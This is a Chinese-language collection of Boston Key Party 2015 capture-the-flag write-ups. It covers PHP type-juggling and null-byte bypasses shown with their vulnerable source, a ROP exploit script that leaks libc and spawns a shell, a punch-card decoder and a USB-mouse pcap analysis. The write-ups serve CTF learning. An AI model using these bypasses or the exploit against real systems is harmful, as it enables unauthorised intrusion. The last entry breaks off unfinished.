Boston Key Party 2015 WriteUps
关于Boston Key Party大赛
Boston Key Party大赛,是美国波士顿大学骇客实验室(Boston University Information Lab & Design Space, BUILDS)精心设计的,这个实验室开放让学生发挥创意,不仅局限网络安全技术,也包括各种实现各种新创想法。
这次波士顿大学所举办的黑客大赛是第四届,比赛设计也非常特别,以美国Boston为中心的地图来呈现题目,在地图上、车站或机场都可能是题目,题目包括了逆向工程、加解密技术、软体工程破解、系统漏洞分析等等。比赛时间长达43小时,台湾HITCON战队参赛选手Orange更是表示兴奋,他说:“因为世界各国选手作息不同,以往每次比赛抢到前面名次,跨夜之后往往一夕变天,这次终于一觉起床还排名第一。”
由于这场竞赛的冠军将可直接取得世界黑客大赛DEFCON的资格,因此吸引了超过八百多支世界强队来挑战,也包括美国卡内基美隆大学世界第一黑客战队PPP前来踢馆,其他的像是美国Samurai、波兰Dragon Sector, 以及国内的蓝莲花战队等世界强队都积极想抢下DEFCON门票。
世界冠军PPP在比赛中再次展现出惊人实力,在比赛结束前10小时竟然就全数解完主办单位的题目,提早拿下冠军。由于PPP已获得DEF CON资格,因此获得第二的台湾HITCON队伍顺利取得DEFCON世界大赛资格。
今年DEF CON将选出15队前往拉斯维加斯竞技,在一月韩国队已经通过日本骇客大赛SECCON取得了门票。而国内队伍能否前往拉斯维加斯,就要再看五月的DEFCON资格赛了。
战果:
波士顿CTF大赛(Boston Key Party)战果:美国PPP战队夺冠,台湾HITCON第二,国内战队蓝莲花(blue-lotus)名列第十
Writeups:
相关参考 writeups
BU Central
BU Central the flag is party : 10 送分题 flag就是 party
Prudential
I dont think that sha1 is broken. Prove me wrong. : 25 http://52.10.107.64:8001/
http://52.10.107.64:8001/?name=admin&password=admin
Your password can not be your name.
<a href="./index.txt">Level 1</a>
<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
if ($_GET['name'] == $_GET['password'])
print 'Your password can not be your name.';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
print '<p class="alert">Invalid password.</p>';
}
?>
[...] else if (sha1(NULL) === sha1(NULL)) [...]
只有都是NULL的时候 才能相等 构造数组形式 http://52.10.107.64:8001/?name[]=0&password[]=1 Flag: I_think_that_I_just_broke_sha1
Symphony
A less than four characters number, bigger than 999?Maybe the bug is elsewhere. : 25 http://52.10.107.64:8002/ http://52.10.107.64/level2/
<?php
require 'flag.php';
if (isset($_GET['password'])) {
if (is_numeric($_GET['password'])){
if (strlen($_GET['password']) < 4){
if ($_GET['password'] > 999)
die('Flag: '.$flag);
else
print '<p class="alert">Too little</p>';
} else
print '<p class="alert">Too long</p>';
} else
print '<p class="alert">Password is not numeric</p>';
}
?>
http://52.10.107.64:8002/?password=998 Too little http://52.10.107.64:8002/?password[]=998 Password is not numeric http://52.10.107.64:8002/?password=1e9 Flag: B4SE10_IS_F0R_LOSERS
Northeastern Univ.
Northeastern Univ. http://52.10.107.64:8003/ Of course, a timing attack might be the answer, but Im quite sure that you can do better than that. : 25
<?php
require 'flag.php';
if (isset($_GET['password'])) {
if (strcmp($_GET['password'], $flag) == 0)
die('Flag: '.$flag);
else
print '<p class="alert">Invalid password.</p>';
}//secpulse.com
?>
使用strcmp的时候 不用=== 而使用了== 可能会出问题 这里也使用数组绕过去了
http://52.10.107.64/level3/?password[]=111
Flag: Still_better_than_the_d0uble_equals
Museum of Fine Arts
Museum of Fine Arts http://52.10.107.64:8004/ Because cryptography is hard, we only implemented a hand-made PRNG. What could possibly go wrong? : 25
<?php
session_start();
require 'flag.php';
if (isset ($_GET['password'])) {
if ($_GET['password'] == $_SESSION['password'])
die ('Flag: '.$flag);
else
print '<p class="alert">Wrong guess.</p>';
}
// Unpredictable seed
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
//secpulse.com
?>
<section class="login">
<div class="title">
<a href="./index.txt">Level 4</a>
</div>
<ul class="list">
<?php
for ($i=0; $i<3; $i++)
print '<li>' . mt_rand (0, 0xffffff) . '</li>';
$_SESSION['password'] = mt_rand (0, 0xffffff);
?>
删除session,请求http://52.10.107.64:8004/?password=
Longwood Medical
Longwood Medical http://52.10.107.64/level5/ Because we dont trust mysqli_real_escape_string, we wrote our own military-grade sanitization method. : 25
<?php
require 'flag.php';
if (isset ($_GET['name']) and isset ($_GET['password'])) {
$name = $_GET['name'];
$password = $_GET['password'];
if (ctype_alnum ($name) and ctype_alnum ($password)) {
$request = 'SELECT login FROM user where login = ' . $name . ' AND password = ' . $password . ';';
$db = new SQLite3 (sha1($flag).'.db', SQLITE3_OPEN_READONLY); // Ghetto anti-database-download
$result = $db->querySingle ($request);
$db->close ();
if ($result === FALSE)
echo '<p class="alert">"Invalid login or password</p>';
else
die('Flag: ' . $flag);
} else
echo '<p class="alert">Invalid chars detected</p>';
}//secpulse.com
?>
<br>
http://52.10.107.64/level5/?login=0&password=0 Flag: Did_you_know_that_in_french_a_chiken_makes_the_sound_quotquotquotquot?
Brigham Circle
Sanitization is hard, lets use regexp! : 25 http://52.10.107.64:8006/
<?php
require 'flag.php';
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
echo '<p class="alert">You password must be alphanumeric</p>';
else if (strpos ($_GET['password'], '--') !== FALSE)
die('Flag: ' . $flag);
else
echo '<p class="alert">Invalid password</p>';
}
?>
<section class="login">
<div class="title">
<a href="./index.txt">Level 6</a>
</div>
<form method="get">
<input type="text" required name="password" placeholder="Password" /><br/>
<input type="submit"/>
</form>
</section>
</body>
</html>
Category: School-Bus Points: 25 Solves Description: %00截断 构造 http://52.10.107.64/level6/?password=a%00-- flag: OK_Maybe_using_rexpexp_wasnt_a_clever_move
Harvard Square
http://bostonkeyparty.net/harvard.6d8d5e833641b27fc5aae4572bea443b can you be a leet 0day broker? 52.1.91.215 2114 (libc is ubuntu adf3305fcd0345f706019cf94687d50b libc-2.19.so) : 275
# leak address
raw_input("wait gdb")
read_until("name? ")
pop_rdi = up64("402fc3")
got = up64("605061")
put = up64("400cd0")
payload = "a"*280 + pop_rdi + got + put + bof
send_line(payload)
read_until("...-'\"\n")
read_until("!\n")
# get leak and count libc
leak = read_line().strip()[::-1].encode("hex")
base = int(leak+"00", 16) - 0x54400
system = hex(base + 0x46640)[2:]
system = up64(system)
binsh = hex(base + 0x17d87b)[2:]
# get and shell out
read_until("name? ")
buf = up64("605800")
payload = "a"*280 + pop_rdi + up64(binsh) + system
send_line(payload)
read_until("!\n")
t.interact()
flag: stay_in_school_and_dont_do_the_grugq
Haymarket
http://bostonkeyparty.net/haymarket.tar.gz.fe35f59bfa869a0555e9972efa3ddd2d //secpulse.com Monty Hall wrote a script of how he was supposed to run one of his game shows for his trusty accounting computer some time ago, but hes not really sure what the punch cards mean any more. I mean, that was a while ago. Only, hes sure his key is hidden somewhere in these punch-cards, if he could figure out how to run them... : 150
下载haymarket.tar.gz得到32张卡片
谷歌到http://www.kloth.net/services/cardpunch.php
http://www.kloth.net/services/pcard.php?punch2=ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789&code=DEC-029&unk=ignore&ccolor=yellow&t=png
from PIL import Image
def decode(code):
if code == ['0']: return '0'
elif code == ['1']: return '1'
elif code == ['2']: return '2'
elif code == ['3']: return '3'
elif code == ['4']: return '4'
elif code == ['5']: return '5'
elif code == ['6']: return '6'
elif code == ['7']: return '7'
elif code == ['8']: return '8'
elif code == ['9']: return '9'
elif code == ['12', '1']: return 'A'
elif code == ['12', '2']: return 'B'
elif code == ['12', '3']: return 'C'
elif code == ['12', '4']: return 'D'
elif code == ['12', '5']: return 'E'
elif code == ['12', '6']: return 'F'
elif code == ['12', '7']: return 'G'
elif code == ['12', '8']: return 'H'
elif code == ['12', '9']: return 'I'
elif code == ['11', '1']: return 'J'
elif code == ['11', '2']: return 'K'
elif code == ['11', '3']: return 'L'
elif code == ['11', '4']: return 'M'
elif code == ['11', '5']: return 'N'
elif code == ['11', '6']: return 'O'
elif code == ['11', '7']: return 'P'
elif code == ['11', '8']: return 'Q'
elif code == ['11', '9']: return 'R'
elif code == ['0', '1']: return '/'
elif code == ['0', '2']: return 'S'
elif code == ['0', '3']: return 'T'
elif code == ['0', '4']: return 'U'
elif code == ['0', '5']: return 'V'
elif code == ['0', '6']: return 'W'
elif code == ['0', '7']: return 'X'
elif code == ['0', '8']: return 'Y'
elif code == ['0', '9']: return 'Z'
elif code == ['11', '2', '8']: return '!'
elif code == ['4', '8']: return '@'
elif code == ['3', '8']: return '#'
elif code == ['11', '3', '8']: return '$'
elif code == ['0', '4', '8']: return '%'
elif code == ['12', '7', '8']: return '^'
elif code == ['12']: return '&'
elif code == ['11', '4', '8']: return '*'
elif code == ['12', '5', '8']: return '('
elif code == ['11', '5', '8']: return ')'
elif code == ['11']: return '-'
elif code == ['6', '8']: return '='
elif code == ['0', '5', '8']: return '_'
elif code == ['0', '3', '8']: return ','
elif code == ['12', '6', '8']: return '+'
elif code == ['12', '2', '8']: return '['
elif code == ['0', '2', '8']: return '['
elif code == ['11', '6', '8']: return ';'
elif code == ['0', '6', '8']: return '>'
elif code == ['5', '8']: return "'"
elif code == ['2', '8']: return ':'
elif code == ['7', '8']: return '"'
elif code == ['11', '7', '8']: return ' '
elif code == ['12', '3', '8']: return '.'
elif code == ['12', '4', '8']: return '<'
else: return '?'
rows = ['12', '11', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
r_h = 20
r_w = 7
r_begin = [16, 21]
nCols = 80
nRows = 12
folder = "/path/to/folder"
for num in range(31):
path = folder +"/L"+ str(num+1) + ".png"
im = Image.open(path)
pix = im.load()
code = []
text = ""
for c in range (80):
for r in range (12):
pos_h = r_begin[1] + r * r_h #+ 3
pos_w = r_begin[0] + c * r_w # + 3
if pix[pos_w, pos_h] == (20, 20, 20, 255):
code.append(rows[r])
if len(code) > 0:
text += decode(code)
code = []
print text
IDENTIFICATIONDIVISION.PROGRAM-ID.LETS-MAKE-A-DEAL.AUTHORMONTEHALPARIN. DATADIVISION.WORKING-STORAGESECTION.01DOORCHOICES.02GOODDOOR PIC9.02FIRSTCHOICEPIC9.02OPENDOORPIC9.02CH ANGEDOORPIC9.01CURRENTDATE.02CURRENTYEARPIC9(4).02 CURRENTMONTHPIC99.02CURRENTDAYPIC99.01DAYOFYEAR.02 CURRENTMONTHFILLERPIC9(4).02YEARDAYPIC9(3).01 CURRENTTIME.02CURRENTHOURPIC99.02CURRENTMINUTEPIC99. 02CURRENTTENSPIC9.02CURRENTONESPIC9.02FILLER PIC99.PROCEDUREDIVISION.DISPLAY'MH:WELCOMETOLETSMAKEADEAL'.DI SPLAY'MH:THEREARETHREEDOORS.ONLYONEWITHTHEKEY'.ACCEPTCURRENTTIMEF ROMTIME.IFCURRENTONES<4SETGOODDOORTO1ELSEIFCURRENTONES<7 SETGOODDOORTO2ELSESETGOODDOORTO3END-IFEND-IFDISPLA Y'MH:YOUMAYONLYOPENONEDOOR.WHICHDOOR?'.IFCURRENTTENS=0ORCURRE NTTENS=3SETFIRSTCHOICETO1.IFCURRENTTENS=1ORCURRENTTENS=4S ETFIRSTCHOICETO2.IFCURRENTTENS=2ORCURRENTTENS=5SETFIRSTCHOICE TO3.DISPLAY'PLAYER:IPICKDOOR'FIRSTCHOICE'.'IFFIRSTCHOICE=GOODDO ORDISPLAY'MH:THATISANINTERESTINGCHOICEOFDOOR.'IFCURRENTTENS= OR0ORCURRENTTENS=4SETOPENDOORTO3END-IFIFCURRENTTENS= 1ORCURRENTTENS=5SETOPENDOORTO1END-IFIFCURRENTTENS=2O 1ORCURRENTTENS=3SETOPENDOORTO2END-IFDISPLAY'MH:LETM EGIVEYOUAHINT.'DISPLAY'MONTYHALLOPENSDOOR'OPENDOORDISPLAY'A GOATRUSHESOUTWITHNOKEY.'DISPLAY'MH:WOULDYOULIKETOCHANGEYOURD GOORCHOICE?'DISPLAY'PLAYER:YES!MYLOGICMINORINCOLLEGEHASAUSE!' GOORIFCURRENTTENS=2ORCURRENTTENS=4SETCHANGEDOORTO1E ND-IFIFCURRENTTENS=0ORCURRENTTENS=5SETCHANGEDOORTO2EN D-IFIFCURRENTTENS=1ORCURRENTTENS=3SETCHANGEDOORTO3END -IFDISPLAY'PLAYER:IWILLCHOOSEDOOR'CHANGEDOOR'INSTEAD!'ELSE SETCHANGEDOORTOFIRSTCHOICE.IFCHANGEDOOR=GOODDOORDISPLAY'MH:CONGRA SETULATIONS!YOUFOUNDAKEY.'DISPLAY'MH:THEKEYIS:'DISPLAY'KEY( SETALEXTREBEKISASOCIALENGINEER)'ELSEDISPLAY'MONTYHALLOPENSTHEDOOR.A GOATJUMPSOUT.'DISPLAY'MH:THISISTHEINCORRECTDOOR.'DISPLAY'THE
倒数第二行找到flag FLAG: ALEXTREBEKISASOCIALENGINEER
http://www.secpulse.com/archives/5013.html
Kendall
http://bostonkeyparty.net/kendall.a125e431e553c7ec2d9845c90c0f4ed1 52.0.164.37:8888 : 300
https://ctfcrew.org/writeup/97 Flag: FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I
Mattapan
(UPDATED!) We have come across an OpenFlow switch. Maybe you could pwn the traffic for us? nc 54.88.69.118 8888 or nc mattapan.bostonkey.party 8888 : 150 http://bostonkeyparty.net/mattapan.0aaf5ce04fa461c5ab676c2f8d8bd492.png 参见https://github.com/ctfs/write-ups-2015/tree/master/boston-key-party-2015/pwning/mattapan
Riverside
omg tha NSA hacked my super secret login, I caught them exfillin this pcap, am I t3h fuxxed? : 200 http://bostonkeyparty.net/challenge.pcapng.28c58da9dd07532d45aa68f9b825941e
参见:https://github.com/ctfs/write-ups-2015/tree/master/boston-key-party-2015/school-bus/riverside
$ ln -s challenge.pcapng.28c58da9dd07532d45aa68f9b825941e challenge.pcapng $ tshark -r challenge.pcapng usb.bDescriptorType and usb.urb_type==67 4 0.075077000 12.0 -> host USB GET DESCRIPTOR Response DEVICE 24 0.150578000 1.0 -> host USB GET DESCRIPTOR Response DEVICE 60 0.047392000 2.0 -> host USB GET DESCRIPTOR Response DEVICE 75 0.074061000 1.0 -> host USB GET DESCRIPTOR Response DEVICE 94 0.150211000 3.0 -> host USB GET DESCRIPTOR Response DEVICE 96 0.150419000 2.0 -> host USB GET DESCRIPTOR Response DEVICE 98 0.150447000 1.0 -> host USB GET DESCRIPTOR Response DEVICE
$ tshark -r challenge.pcapng usb.bDescriptorType and usb.urb_type==67 -T fields -e usb.bus_id -e usb.device_address -e usb.idVendor -e usb.idProduct 2 12 0x046d 0xc00e 3 1 0x1d6b 0x0003 1 2 0x8087 0x8000 1 1 0x1d6b 0x0002 2 3 0x5986 0x0268 2 2 0x8087 0x07dc 2 1 0x1d6b 0x0002
Bus 002 Device 012: ID 046d:c00e Logitech M-BJ58/M-BJ69 Optical Wheel Mouse Bus 003 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 002: ID 8087:8000 Intel Integrated Rate Matching Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 002 Device 003: ID 5986:0268 Acer Integrated Camera Bus 002 Device 002: ID 8087:07dc Intel 7260AC Bluetooth Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
$ tshark -r challenge.pcapng 'usb.data_flag=="present (0)"' -T fields -e usb.bus_id -e usb.device_address -e usb.endpoint_number.endpoint | sort | uniq -c
12 1 1 0
2 1 1 1
12 1 2 0
1 1 2 1
7 2 1 0
1 2 1 1
1 2 12 0
7608 2 12 1
1 2 2 0
3 2 3 0
9 3 1 0
1 3 1 1
$ tshark -r challenge.pcapng usb.capdata and usb.device_address==12 -T fields -e usb.capdata > mouse_data.txt
$ head mouse_data.txt
00:01:00:00
00:01:00:00
00:01:00:00
00:01:00:00
00:01:00:00
00:02:00:00
00:02:ff:00
00:02:00:00
00:03:ff:00
00:01:00:00
0x8 0 1
0x8 1 0
0x28 0 -1
0x18 -1 0
0x9 0 0
0x8 0 0
$ sed -n 7597,7604p mouse_data.txt
00:f4:02:00
00:f4:01:00
00:f4:00:00
00:f5:00:00
00:f5:ff:00
00:f5:00:00
00:f6:ff:00
00:f7:ff:00
$ awk -F: '{print$1}' mouse_data.txt | sort | uniq -c
7518 00
90 01
$ awk -F: '{print$4}' mouse_data.txt | sort | uniq -c
7608 00
$ awk -F: 'function comp(v){if(v>127)v-=256;return v}{x+=comp(strtonum("0x"$2));y+=comp(strtonum("0x"$3))}$1=="01"{print x,y}' mouse_data.txt | tee click_coordinates.txt | head -5
460 -286
586 -203
289 -288
567 -31
117 -291
$ gnuplot -e "plot 'click_coordinates.txt'"
$ awk 'BEGIN{split(" zxcvbnm asdfghjkl qwertyuiop",key,//)}{r=int(($2-20)/-100);c=int(($1 - 117 + (r % 2 * 40)) / 85);k=r*10+c;printf "%s",key[k]}END{print""}' click_coordinates.txt
the quick brown fox jumps ovver the lazy dog thekeyisiheardyoulikedsketchyetchingglastyear
$ grep -C2 01:ff:00:00 mouse_data.txt
00:00:ff:00
01:00:00:00
01:ff:00:00
00:00:00:00
00:01:ff:00
--
00:00:01:00
01:00:00:00
01:ff:00:00
00:00:00:00
00:02:00:00
$ tshark -r challenge.pcapng usb.capdata and usb.device_address==12 -T fields -e usb.capdata | grep -v 01:ff:00:00 > mouse_data.txt
$ awk -F: 'function comp(v){if(v>127)v-=256;return v}{x+=comp(strtonum("0x"$2));y+=comp(strtonum("0x"$3))}$1=="01"{print x,y}' mouse_data.txt > click_coordinates.txt
$ awk 'BEGIN{split(" zxcvbnm asdfghjkl qwertyuiop",key,//)}{r=int(($2-20)/-100);c=int(($1 - 117 + (r % 2 * 40)) / 85);k=r*10+c;printf "%s",key[k]}END{print""}' click_coordinates.txt
the quick brown fox jumps over the lazy dog thekeyisiheardyoulikedsketchyetchinglastyear
Wood Island
You can try to sign messages and send them to the server, 52.0.217.48 port 60231. Sign the right message and you'll get the flag! Only problem---you don't have the signing key. I will give you this, though: sigs.txt is a file containing a bunch of signatures. I hope it helps. (P.S. Don't try and send the exact signatures in that file---that's cheating!) : 150 http://bostonkeyparty.net/wood-island.tar.gz.3cd7b18f7ae8205b0a71097733e0c4bb
Writeup by epochfail. The task was to forge an ElGamal signature of a fixed string, given a collection of signatures. We are also provided with the prime, p, and generator element g: the public parameters of an ElGamal signing system. The server reads the signed message as a tuple, (r, s, m), verifying that the signature is valid and not one of the provided strings. If the message checks out (m == "There is no need to be upset"), it will send the flag.
【安全脉搏(www.secpulse.com) SP小编整理发布 未完结待续】